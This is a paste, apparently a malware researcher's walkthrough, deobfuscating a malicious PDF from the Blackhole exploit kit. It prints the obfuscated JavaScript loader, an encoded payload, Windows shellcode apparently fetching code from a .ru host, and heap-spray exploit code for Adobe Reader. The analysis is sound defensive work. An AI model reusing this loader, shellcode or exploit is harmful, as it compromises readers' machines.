Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //=========================================
- // #MalwareMustDie | @unixfreaxjp ~]$ date
- // Mon Nov 26 16:35:46 JST 2012
- //
- // Guide Step by Step of Analysis Malicious PDF : infector2.pdf
- // With the decoding guide step by step
- // As per found in Case: http://malwaremustdie.blogspot.jp/2012/11/plugindetect-079-payloads-of-blackhole.html
- // Target is uploaded in VT at: https://www.virustotal.com/file/f3880c001bf094902f8a0a76e55cacd18555fe593dbe463f4aca9b4ad7050310/analysis/
- // *) the materials contains dangerous code, yet we hexed it, so it cannot be used as per it is.
- //=========================================
- ================================
- CONFIRMING THE OBJECT
- ; Make sure we can spot the suspicious
- ; object like JS or JavaScript..
- =================================
- // I always confirm it with the below
- PDFiD 0.0.11 ./infector2.pdf
- PDF Header: %PDF-1.6
- obj 27
- endobj 27
- stream 13
- endstream 12
- xref 2
- trailer 2
- startxref 0
- /Page 2
- /Encrypt 0
- /ObjStm 0 // suspect the below...
- /JS 0 // <======== There...
- /JavaScript 0 // <=========== there....
- /AA 0
- /OpenAction 0
- /AcroForm 1
- /JBIG2Decode 0
- /RichMedia 0
- /Launch 0
- /Colors > 2^24 0
- %%EOF 1
- After last %%EOF 0
- Total entropy: 6.410619 ( 14769 bytes)
- Entropy inside streams: 7.874169 ( 3783 bytes)
- Entropy outside streams: 5.203651 ( 10986 bytes)
- 0000 25 50 44 46 2D 31 2E 36 0D 25 E2 E3 CF D3 0D 0A %PDF-1.6.%......
- 0010 35 32 20 30 20 6F 62 6A 3C 3C 2F 4C 65 6E 67 74 52 0 obj<</Lengt
- 0020 68 20 36 36 33 32 32 2F 52 6F 6F 74 20 31 20 30 h 66322/Root 1 0
- 0030 20 52 2F 49 6E 66 6F 20 33 20 30 20 52 25 2F 46 R/Info 3 0 R%/F
- 0040 69 6C 74 65 72 2F 46 6C 61 74 65 44 65 63 6F 64 ilter/FlateDecod
- 0050 65 2F 57 5B 31 20 32 20 31 5D 2F 49 6E 64 65 78 e/W[1 2 1]/Index
- 0060 5B 35 20 31 20 37 20 31 20 39 20 34 20 32 33 20 [5 1 7 1 9 4 23
- 0070 34 20 35 30 20 33 5D 3E 3E 73 74 72 65 61 6D 0D 4 50 3]>>stream.
- 0080 2F 46 69 6C 74 65 72 2F 46 6C 61 74 65 44 65 63 /Filter/FlateDec
- 0090 6F 64 65 2F 57 5B 31 20 32 20 31 5D 2F 49 6E 64 ode/W[1 2 1]/Ind
- 00A0 65 78 5B 35 20 31 20 37 20 31 20 39 20 34 20 32 ex[5 1 7 1 9 4 2
- 00B0 33 20 34 20 35 30 20 33 5D 3E 3E 73 74 72 65 61 3 4 50 3]>>strea
- 00C0 6D 0D 78 DA 62 62 62 30 62 60 62 60 60 60 C4 47 m.x.bbb0b`b```.G
- 00D0 30 FE 02 12 FF D9 21 AC FF 0C 77 FF 33 31 30 5A 0.....!...w.310Z
- 00E0 83 B4 F5 32 00 04 18 00 77 1F 06 F5 0D 0A 65 6E ...2....w.....en
- 00F0 64 73 74 72 65 61 6D 0D 65 6E 64 6F 62 6A 0D 31 dstream.endobj.1
- 0100 20 30 20 6F 62 6A 3C 3C 2F 4D 61 72 6B 49 6E 66 0 obj<</MarkInf
- : : :
- ================================
- DETECTING JAVASCRIPT
- ; Check JS's Location first
- ; Note: there is a possibilty of
- ; a scattered script, so read it well..
- ; My recommendation is see the all strings or
- ; use the hex editor to understand the address
- ; of the script.
- ================================
- // in the address 0x2EBC-0x32E5 there is a JS code
- <xfa:script contentType='application/x-javascript'>
- /*
- */
- with(event){
- l="l";
- ev=/*ewbwf*/"eva"/*/renyaerz*/;
- t=target;
- aa=/*/gbergern*/'co'+'de]';
- ind="indexOf";
- if(app.setProfile)if((app.setProfile+/**/"asvfa")[ind](aa)!=-1){k=t[/*czx*/ev/*qwdsa*/+l/*sgewgerj*/];}
- a=/**/t.creationDate.split('|')[0].substr(13);
- }
- s="";
- p=k("pars"+"eInt");
- z=a;
- e="de";
- ll="length";
- ss=/*bgre*/k("String");
- ff="from";
- ff+="Ch";
- ff+="arCo";
- ss=ss[ff/*x*/+e];
- xz=a.length;
- for(i=0;i<xz;i+=2){
- if (z[i]=='-')continue;
- s=s+(ss(p(z[i]+z[i+1],0x1a)));
- }
- zx=k;
- zx(s);
- </xfa:script>
- =================================
- DECODING PREPARATION
- =================================
- // Like previously decoded, strip the PDF tags and..
- // this is the generator code used for deobfuscating the obfs'ed data
- // this script tried to fool Virus scanning by writing many /* comment */ in there...
- // so just re-write it and make it nice like this below:
- with(event)
- {
- l="l";
- ev="eva";
- t=target;
- aa='co'+'de]';
- ind="indexOf";
- if(app.setProfile)if((app.setProfile+"asvfa")[ind](aa)!=-1)
- {
- k=t[ev+l];
- }
- a=t.creationDate.split('|')[0].substr(13);
- }
- s="";
- p=k("pars"+"eInt");
- z=a;
- e="de";
- ll="length";
- ss=k("String");
- ff="from";
- ff+="Ch";
- ff+="arCo";
- ss=ss[ff+e];
- xz=a.length;
- for(i=0;i<xz;i+=2)
- {
- if (z[i]=='-')continue;
- s=s+(ss(p(z[i]+z[i+1],0x1a)));
- }
- zx=k;
- zx(s);
- ===============================
- FIND THE OBFUSCATION DATA
- ; again... it maybe scattered,
- ; pls be sure/careful
- =================================
- // it called to the data in tags t.creationDate, so let's grep the strings :-)
- // then we found the data in address 0x1A1C as per below:
- <<
- /Title(asdasdsad)/CreationDate(%#^&*%^#@&%#@3J-148481K3J-8443N4A4C-8293N4E3N-4464C1K4C-03J4A3P3N-44C1K3L4A-83N3J4C41-847462G3J-84C3N1K4B-6484414C-81E1D4K1D-91F3D1N3F-41K4A3N48-2443J3L3N-91E1L271L-33P1I1D1D-31F274E3J-04A16483J-53M3M4146-13P274E3J-64A163K3K-03K1I163L-43L3L1I16-43M3M3M1I-7163N3N3N-91I163O3O-53O1I163P-53P3P1I16-640404027-14E3J4A16-248474146-84C3N4A4B-93H3J1I16-041274E3J-44A164G16-22916463N-74F162D4A-24A3J4H1E-21F274E3J-54A164H16-02916463N-04F162D4A-64A3J4H1E-51F274E3J-34A163H44-71N291820-03L1O1M22-81M1M3O1M-7211N2324-61M203J1P-93L1O1M22-61M1M3O1M-63O221P24-51M203J3J-01P3N3K24-51M203J1P-51M1O1M24-51O203J22-23N1O3O24-11M203J20-81N201N20-41N201N1O-1221M1M1M-91M1M1M1M-71M1M1M1M-81M1M1M1M-31M1M1M1M-61M1M1M1M-01M1M1M1M-61M1M1M1N-31O1P2524-31M203J22-6201O1M22-91M1M3O1M-81M1M201M-11M1M1M20-61N201N20-81N201N20-01N201N20-61N201N18-61H3N4E3N-1464C1K4C-23J4A3P3N-54C1K3L4A-93N3J4C41-247462G3J-24C3N1K4B-44844414C-91E1D4K1D-51F3D1N3F-71K4A3N48-9443J3L3N-11E1L271L-13P1I1D1D-81F274E3J-84A163H44-91O291820-23L1O1M22-61M1M3O3J-121221P24-81M203J1P-93L1O1M22-41M1M3O25-6221O1N24-01M203J25-41M1N3O24-81M203J1P-71M251M24-520203J23-03M233N24-51M203J20-31N201N20-11N201N1O-9221M1M1M-81M1M1M1M-01M1M1M1M-31M1M1M1M-11M1M1M1M-61M1M1M1M-41M1M1M1M-81M1M1M23-41N242424-31M203J22-9201O1M22-71M1M3O1M-31M1M201M-01M1M1M20-61N201N20-51N201N20-61N201N20-91N201N18-51H3N4E3N-6464C1K4C-63J4A3P3N-24C1K3L4A-63N3J4C41-047462G3J-24C3N1K4B-54844414C-71E1D4K1D-21F3D1N3F-21K4A3N48-1443J3L3N-31E1L271L-13P1I1D1D-11F273H44-61P293J48-648273H44-42029463N-24F162D4A-04A3J4H1E-21F273O4D-8463L4C41-34746163H-444211E1F-54J4E3J4A-9163H4422-4293H441P-31K4E413N-64F3N4A38-23N4A4B41-347461K4C-247354C4A-041463P1E-91F273H44-622293H44-9221K4A3N-148443J3L-03N1E1D1K-41D1I1D1D-11F274F40-241443N1E-93H44221K-2443N463P-74C402820-21F3H4422-31H291D1M-51D274A3N-94C4D4A46-016483J4A-84B3N2L46-94C1E3H44-2221I1N1M-81F4L3O4D-5463L4C41-84746163H-644231E3H-444241I3H-244251F4J-94F404144-03N1E3H44-5241K443N-4463P4C40-41G1O283H-744251F3H-544241H29-23H442427-64A3N4C4D-94A46163H-244241K4B-34D3K4B4C-04A41463P-41E1M1I3H-244251L1O-41F4L3O4D-4463L4C41-44746163H-92L1M1E3H-92L1N1F4J-33H2L1N29-94D463N4B-93L3J483N-51E3H2L1N-41F274A47-04C3N2G3J-243293H2L-21N1K443N-6463P4C40-81G1O273M-73J433447-74C3N294D-8463N4B3L-43J483N1E-41D1B4D25-51M251M1D-11F274B48-14A3J4H29-73H44231E-83M3J4334-0474C3N1I-01M4G1O1M-11M1M1J4A-0474C3N2G-63J431F27-344474G39-4403N3N29-23H2L1N1H-94B484A3J-44H274447-44G39403N-53N293H44-5231E4447-34G39403N-03N1I211O-9201M2524-31F273O47-44A1E4129-21M271641-116281620-21M1M2716-9411H1H1F-93H44203D-2413F2944-3474G3940-53N3N1K4B-74D3K4B4C-64A1E1M1I-644474G39-5403N3N1K-4443N463P-74C401J1N-71F1H3M3J-54334474C-93N274L3O-54D463L4C-041474616-43H2L1O1E-83H2L1N1I-0443N461F-04J4F4041-2443N1E3H-52L1N1K44-53N463P4C-74028443N-7461F3H2L-71N1H293H-32L1N274A-13N4C4D4A-946163H2L-41N1K4B4D-53K4B4C4A-041463P1E-51M1I443N-7461F4L3O-54D463L4C-041474616-53H2L1P1E-13H2L1N1F-74J4A3N4C-2291D1D27-63O474A1E-441291M27-141283H2L-31N1K443N-3463P4C40-627411H29-41O1F4J3K-9293H2L1N-41K4B4D3K-44B4C4A1E-1411I1O1F-8273L2948-13J4A4B3N-92L464C1E-63K1I1N22-01F274A3N-64C1H2935-94C4A4146-33P1K3O4A-547452F40-53J4A2F47-83M3N1E3L-71F274L4A-13N4C4D4A-546164A3N-24C4L3O4D-1463L4C41-24746163H-542411N1E-03H2L1N1I-63H2L201F-34J3H2L21-4291D1D27-73O474A1E-73H2L2229-01M273H2L-422283H2L-11N1K443N-1463P4C40-0273H2L22-71H1H1F4J-53H442529-93H2L201K-0443N463P-44C40273H-72L23293H-02L1N1K3L-0403J4A2F-8473M3N2D-34C1E3H2L-7221F273H-32L24293H-32L201K3L-4403J4A2F-4473M3N2D-84C1E3H2L-8221B3H44-8251F273H-32L211H29-5354C4A41-8463P1K3O-94A47452F-9403J4A2F-5473M3N1E-73H2L233G-63H2L241F-5274L4A3N-34C4D4A46-9163H2L21-84L3O4D46-53L4C4147-846163H2L-3251E3H2L-6221F4J3H-0421M293H-72L221K4C-347354C4A-041463P1E-91N221F27-33H421N29-53H421M1K-6443N463P-74C40273H-82L21291E-23H421N1B-31O1F2B1D-81M1D1H3H-0421M263H-1421M274A-13N4C4D4A-646163H2L-2214L3O4D-3463L4C41-74746163H-7421O1E3H-22L1N1F4J-33H2L2129-41D1D273O-5474A1E3H-42L22291M-2273H2L22-2283H2L1N-41K443N46-83P4C4027-93H2L221H-4291O1F4J-73H2L211H-4291D1B4D-61D273H2L-7211H293H-82L251E3H-32L1N1K3L-5403J4A2F-5473M3N2D-34C1E3H2L-8221H1N1F-81F273H2L-1211H293H-82L251E3H-22L1N1K3L-5403J4A2F-6473M3N2D-44C1E3H2L-8221F1F4L-34A3N4C4D-34A46163H-02L214L3O-84D463L4C-741474616-73H421P1E-41F4J3H42-120293H44-9211E1F27-8413O1E3H-142202825-81M1M1M1F-44J3H4221-9291D471H-34D2D3542-03P3P3P43-6484D2O20-12E2N1L1L-31L1L1L4F-12D2D2D2D-82E2D2D2D-62D2D2D2D-12D2D2D2D-82D332D2D-02D2D2D2D-22D2D3O40-03J2D3541-72D3P3B2D-825242H2L-62E2N1D27-53H422229-43H441N27-93H422329-73H2L1P1E-43H42221F-64L3N444B-43N4J3H42-121291D43-02E1H2D35-542413340-92H48253O-1472E2N1L-41L1L1L1L-44F2D2D2D-02D2E2D2D-92D2D2D2D-62D2D2D2D-82D2D332D-22D2D2D2D-22D2D2D3B-24G2F2D35-2412D3P3B-02D1L3O2H-3202E2N1D-0273H4222-2293H441O-5273H4223-1293H2L1P-91E3H4222-61F4L3H42-724291D35-43743492D-22G3P3P2D-92D2E2E1D-1273H4225-8293H2L1O-51E1D3337-72I2E1D1I-91N1M2524-7201F273H-344441M29-11D33333L-92D2D2D2H-92G2D2D2H-72D2D2D2D-14F2L2D2D-02D2D332H-32G2D2D2H-02D2D2D2D-42E2D2D2D-72D2D4F2H-42G2D2D2H-62D2D2D2D-82E2D2D2D-92D2E3P2H-62G2D2D2H-02D2D2D2D-72E2D2D2D-92D2H332H-02H2D2D2H-52D2D2D2D-92L2D2D2D-62D2I4F2H-92H2D2D2H-82D2D2D2D-04F2L2D2D-72D372D2H-32G2D2P4F-72D2D2D2F-9352L2D2D-32D2D2D2D-22D2D2D2D-02P2G2D42-21L1L1L1L-31L1D273H-744441N29-33H42241H-33H42251H-23H44441M-51H3H4221-7273H4444-01O293H42-1411N1E3H-342231I1D-81D1F2741-13O1E3H44-2441O1K44-03N463P4C-8401B1O1F-13H44441O-21H294D46-33N4B3L3J-0483N1E1D-91B1M1M1D-21F273H44-8441P293H-9421O1E3H-144441O1F-4274F414C-8401E4J43-0263H4444-71P4L1F3H-32L1M1E43-01F272L45-13J3P3N2I-6413N443M-91N1K4A3J-44F383J44-24D3N293H-244441N4L-23H421P1E-91F27|6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f64656c656d6961746f722e72753a383038302f666f72756d2f6c696e6b732f636f6c756d6e2e7068703f6b73636e68637a3d33303a316e3a31693a31693a3333266973716a743d32763a316b3a316d3a33323a33333a316b3a316b3a33313a316a3a316f26686d786f77783d3169266467616d777278783d6c7466766d267869647570793d6a6a6e71686c0000)
- >>
- ====================================
- ANALYZING THE PATTERN OF THE
- OBFUSCATION DATA
- ; in obfs JS infector it has to be -
- ; a generator, or shellcode, or
- ; maybe an exploit strings...
- ; the amount of chars used and its
- ; origin data will make easy to know the pattern & help us to
- ; analyze further
- =====================================
- // Again, see the data pattern first it has two pattern of below,
- // a long one, indicating me an obfuscated code.
- 148481K3J-8443N4A4C-8293N4E3N-4464C1K4C
- 33P1I1D1D-31F274E3J-04A16483J-53M3M4146
- 248474146-84C3N4A4B-93H3J1I16-041274E3J
- 71N291820-03L1O1M22-81M1M3O1M-7211N2324
- 81N201N20-41N201N1O-1221M1M1M-91M1M1M1M
- 11M1M1M20-61N201N20-81N201N20-01N201N20
- 71K4A3N48-9443J3L3N-11E1L271L-13P1I1D1D
- // and this , by experience it's indicating me a shellcode...
- 683e4fcfc85e47534e95f33c0648b40308b40
- b762003f533c94941fcad03c533db0fbe1038
- 396ebf38b68088bf76a0559e898ffffffe2f9
- 281ec040100008d5c240cc7042472656773c7
- 41d0441516a006a0053576a00ff561485c075
- // Then see the code here:
- //
- // a=t.creationDate.split('|')[0].substr(13);
- //
- // So let's reverse it, go from behind,
- // substr(13) = just erase the first 13 chars,
- // a=t.creationDate.split('|') = making array of var a which separation data splitted by "|"
- // So the "a" value is becoming like the two group of data below:
- 3J-148481K3J-8443N4A4C-8293N4E3N-4464C1K4C-03J4A3P3N-44C1K3L4A-83N3J4C41-847462G3J-84C3N1K4B-64844414C-81E1D4K1D-91F3D1N3F-41K4A3N48-2443J3L3N-91E1L271L-33P1I1D1D-31F274E3J-04A16483J-53M3M4146-13P274E3J-64A163K3K-03K1I163L-43L3L1I16-43M3M3M1I-7163N3N3N-91I163O3O-53O1I163P-53P3P1I16-640404027-14E3J4A16-248474146-84C3N4A4B-93H3J1I16-041274E3J-44A164G16-22916463N-74F162D4A-24A3J4H1E-21F274E3J-54A164H16-02916463N-04F162D4A-64A3J4H1E-51F274E3J-34A163H44-71N291820-03L1O1M22-81M1M3O1M-7211N2324-61M203J1P-93L1O1M22-61M1M3O1M-63O221P24-51M203J3J-01P3N3K24-51M203J1P-51M1O1M24-51O203J22-23N1O3O24-11M203J20-81N201N20-41N201N1O-1221M1M1M-91M1M1M1M-71M1M1M1M-81M1M1M1M-31M1M1M1M-61M1M1M1M-01M1M1M1M-61M1M1M1N-31O1P2524-31M203J22-6201O1M22-91M1M3O1M-81M1M201M-11M1M1M20-61N201N20-81N201N20-01N201N20-61N201N18-61H3N4E3N-1464C1K4C-23J4A3P3N-54C1K3L4A-93N3J4C41-247462G3J-24C3N1K4B-44844414C-91E1D4K1D-51F3D1N3F-71K4A3N48-9443J3L3N-11E1L271L-13P1I1D1D-81F274E3J-84A163H44-91O291820-23L1O1M22-61M1M3O3J-121221P24-81M203J1P-93L1O1M22-41M1M3O25-6221O1N24-01M203J25-41M1N3O24-81M203J1P-71M251M24-520203J23-03M233N24-51M203J20-31N201N20-11N201N1O-9221M1M1M-81M1M1M1M-01M1M1M1M-31M1M1M1M-11M1M1M1M-61M1M1M1M-41M1M1M1M-81M1M1M23-41N242424-31M203J22-9201O1M22-71M1M3O1M-31M1M201M-01M1M1M20-61N201N20-51N201N20-61N201N20-91N201N18-51H3N4E3N-6464C1K4C-63J4A3P3N-24C1K3L4A-63N3J4C41-047462G3J-24C3N1K4B-54844414C-71E1D4K1D-21F3D1N3F-21K4A3N48-1443J3L3N-31E1L271L-13P1I1D1D-11F273H44-61P293J48-648273H44-42029463N-24F162D4A-04A3J4H1E-21F273O4D-8463L4C41-34746163H-444211E1F-54J4E3J4A-9163H4422-4293H441P-31K4E413N-64F3N4A38-23N4A4B41-347461K4C-247354C4A-041463P1E-91F273H44-622293H44-9221K4A3N-148443J3L-03N1E1D1K-41D1I1D1D-11F274F40-241443N1E-93H44221K-2443N463P-74C402820-21F3H4422-31H291D1M-51D274A3N-94C4D4A46-016483J4A-84B3N2L46-94C1E3H44-2221I1N1M-81F4L3O4D-5463L4C41-84746163H-644231E3H-444241I3H-244251F4J-94F404144-03N1E3H44-5241K443N-4463P4C40-41G1O283H-744251F3H-544241H29-23H442427-64A3N4C4D-94A46163H-244241K4B-34D3K4B4C-04A41463P-41E1M1I3H-244251L1O-41F4L3O4D-4463L4C41-44746163H-92L1M1E3H-92L1N1F4J-33H2L1N29-94D463N4B-93L3J483N-51E3H2L1N-41F274A47-04C3N2G3J-243293H2L-21N1K443N-6463P4C40-81G1O273M-73J433447-74C3N294D-8463N4B3L-43J483N1E-41D1B4D25-51M251M1D-11F274B48-14A3J4H29-73H44231E-83M3J4334-0474C3N1I-01M4G1O1M-11M1M1J4A-0474C3N2G-63J431F27-344474G39-4403N3N29-23H2L1N1H-94B484A3J-44H274447-44G39403N-53N293H44-5231E4447-34G39403N-03N1I211O-9201M2524-31F273O47-44A1E4129-21M271641-116281620-21M1M2716-9411H1H1F-93H44203D-2413F2944-3474G3940-53N3N1K4B-74D3K4B4C-64A1E1M1I-644474G39-5403N3N1K-4443N463P-74C401J1N-71F1H3M3J-54334474C-93N274L3O-54D463L4C-041474616-43H2L1O1E-83H2L1N1I-0443N461F-04J4F4041-2443N1E3H-52L1N1K44-53N463P4C-74028443N-7461F3H2L-71N1H293H-32L1N274A-13N4C4D4A-946163H2L-41N1K4B4D-53K4B4C4A-041463P1E-51M1I443N-7461F4L3O-54D463L4C-041474616-53H2L1P1E-13H2L1N1F-74J4A3N4C-2291D1D27-63O474A1E-441291M27-141283H2L-31N1K443N-3463P4C40-627411H29-41O1F4J3K-9293H2L1N-41K4B4D3K-44B4C4A1E-1411I1O1F-8273L2948-13J4A4B3N-92L464C1E-63K1I1N22-01F274A3N-64C1H2935-94C4A4146-33P1K3O4A-547452F40-53J4A2F47-83M3N1E3L-71F274L4A-13N4C4D4A-546164A3N-24C4L3O4D-1463L4C41-24746163H-542411N1E-03H2L1N1I-63H2L201F-34J3H2L21-4291D1D27-73O474A1E-73H2L2229-01M273H2L-422283H2L-11N1K443N-1463P4C40-0273H2L22-71H1H1F4J-53H442529-93H2L201K-0443N463P-44C40273H-72L23293H-02L1N1K3L-0403J4A2F-8473M3N2D-34C1E3H2L-7221F273H-32L24293H-32L201K3L-4403J4A2F-4473M3N2D-84C1E3H2L-8221B3H44-8251F273H-32L211H29-5354C4A41-8463P1K3O-94A47452F-9403J4A2F-5473M3N1E-73H2L233G-63H2L241F-5274L4A3N-34C4D4A46-9163H2L21-84L3O4D46-53L4C4147-846163H2L-3251E3H2L-6221F4J3H-0421M293H-72L221K4C-347354C4A-041463P1E-91N221F27-33H421N29-53H421M1K-6443N463P-74C40273H-82L21291E-23H421N1B-31O1F2B1D-81M1D1H3H-0421M263H-1421M274A-13N4C4D4A-646163H2L-2214L3O4D-3463L4C41-74746163H-7421O1E3H-22L1N1F4J-33H2L2129-41D1D273O-5474A1E3H-42L22291M-2273H2L22-2283H2L1N-41K443N46-83P4C4027-93H2L221H-4291O1F4J-73H2L211H-4291D1B4D-61D273H2L-7211H293H-82L251E3H-32L1N1K3L-5403J4A2F-5473M3N2D-34C1E3H2L-8221H1N1F-81F273H2L-1211H293H-82L251E3H-22L1N1K3L-5403J4A2F-6473M3N2D-44C1E3H2L-8221F1F4L-34A3N4C4D-34A46163H-02L214L3O-84D463L4C-741474616-73H421P1E-41F4J3H42-120293H44-9211E1F27-8413O1E3H-142202825-81M1M1M1F-44J3H4221-9291D471H-34D2D3542-03P3P3P43-6484D2O20-12E2N1L1L-31L1L1L4F-12D2D2D2D-82E2D2D2D-62D2D2D2D-12D2D2D2D-82D332D2D-02D2D2D2D-22D2D3O40-03J2D3541-72D3P3B2D-825242H2L-62E2N1D27-53H422229-43H441N27-93H422329-73H2L1P1E-43H42221F-64L3N444B-43N4J3H42-121291D43-02E1H2D35-542413340-92H48253O-1472E2N1L-41L1L1L1L-44F2D2D2D-02D2E2D2D-92D2D2D2D-62D2D2D2D-82D2D332D-22D2D2D2D-22D2D2D3B-24G2F2D35-2412D3P3B-02D1L3O2H-3202E2N1D-0273H4222-2293H441O-5273H4223-1293H2L1P-91E3H4222-61F4L3H42-724291D35-43743492D-22G3P3P2D-92D2E2E1D-1273H4225-8293H2L1O-51E1D3337-72I2E1D1I-91N1M2524-7201F273H-344441M29-11D33333L-92D2D2D2H-92G2D2D2H-72D2D2D2D-14F2L2D2D-02D2D332H-32G2D2D2H-02D2D2D2D-42E2D2D2D-72D2D4F2H-42G2D2D2H-62D2D2D2D-82E2D2D2D-92D2E3P2H-62G2D2D2H-02D2D2D2D-72E2D2D2D-92D2H332H-02H2D2D2H-52D2D2D2D-92L2D2D2D-62D2I4F2H-92H2D2D2H-82D2D2D2D-04F2L2D2D-72D372D2H-32G2D2P4F-72D2D2D2F-9352L2D2D-32D2D2D2D-22D2D2D2D-02P2G2D42-21L1L1L1L-31L1D273H-744441N29-33H42241H-33H42251H-23H44441M-51H3H4221-7273H4444-01O293H42-1411N1E3H-342231I1D-81D1F2741-13O1E3H44-2441O1K44-03N463P4C-8401B1O1F-13H44441O-21H294D46-33N4B3L3J-0483N1E1D-91B1M1M1D-21F273H44-8441P293H-9421O1E3H-144441O1F-4274F414C-8401E4J43-0263H4444-71P4L1F3H-32L1M1E43-01F272L45-13J3P3N2I-6413N443M-91N1K4A3J-44F383J44-24D3N293H-244441N4L-23H421P1E-91F27
- // and next one is....
- 6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f64656c656d6961746f722e72753a383038302f666f72756d2f6c696e6b732f636f6c756d6e2e7068703f6b73636e68637a3d33303a316e3a31693a31693a3333266973716a743d32763a316b3a316d3a33323a33333a316b3a316b3a33313a316a3a316f26686d786f77783d3169266467616d777278783d6c7466766d267869647570793d6a6a6e71686c0000
- //So put the above data FIRST ARRAY ONLY into array of variable a, and runs the rest (below) of the script;
- s="";
- p=k("pars"+"eInt");
- z=a;
- e="de";
- ll="length";
- ss=k("String");
- ff="from";
- ff+="Ch";
- ff+="arCo";
- ss=ss[ff+e];
- xz=a.length;
- for(i=0;i<xz;i+=2)
- {
- if (z[i]=='-')continue;
- s=s+(ss(p(z[i]+z[i+1],0x1a)));
- }
- // zx=k; <-- we don't need these mumbo jumbo
- // zx(s); instead just burp the result of s variable as per below:
- eval (s); // or you can use command of ==> document.write(a);
- // it will burp us two eval() values,
- // one is ..... just ignored it...
- // and the other value is the condensed code as per below:
- app.alert=event.target.creationDate.split('|')[1].replace(/;/g,'');var padding;var bbb,ccc,ddd,eee,fff,ggg,hhh;var pointers_a,i;var x=new Array();var y=new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');_l3=app;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.replace('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=_l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=0;i<400;i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote}function _I2(_I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(_I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=String.fromCharCode(c)}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l9);_I5+=String.fromCharCode(_I7^_I8)}return _I5}function _I9(_I6){_j0=_I6.toString(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5='';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=_I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_j7,'');if(_ll2.length%2)_ll2+=unescape('%00');_ll3=_j2(_ll2);with({k:_ll3})_I0(k);ImageField1.rawValue=_ll1}_j3();
- //We make it beautiful to read as per below: ;-)
- app.alert = event.target.creationDate.split('|')[1].replace(/; /g, '');
- var padding;
- var bbb, ccc, ddd, eee, fff, ggg, hhh;
- var pointers_a, i;
- var x = new Array();
- var y = new Array();
- var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/; /g, '');
- var _l2 = "4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/; /g, '');
- _l3 = app;
- _l4 = new Array();
- function _l5()
- {
- var _l6 = _l3.viewerVersion.toString();
- _l6 = _l6.replace('.', '');
- while (_l6.length < 4)_l6 += '0';
- return parseInt(_l6, 10)
- }
- function _l7(_l8, _l9)
- {
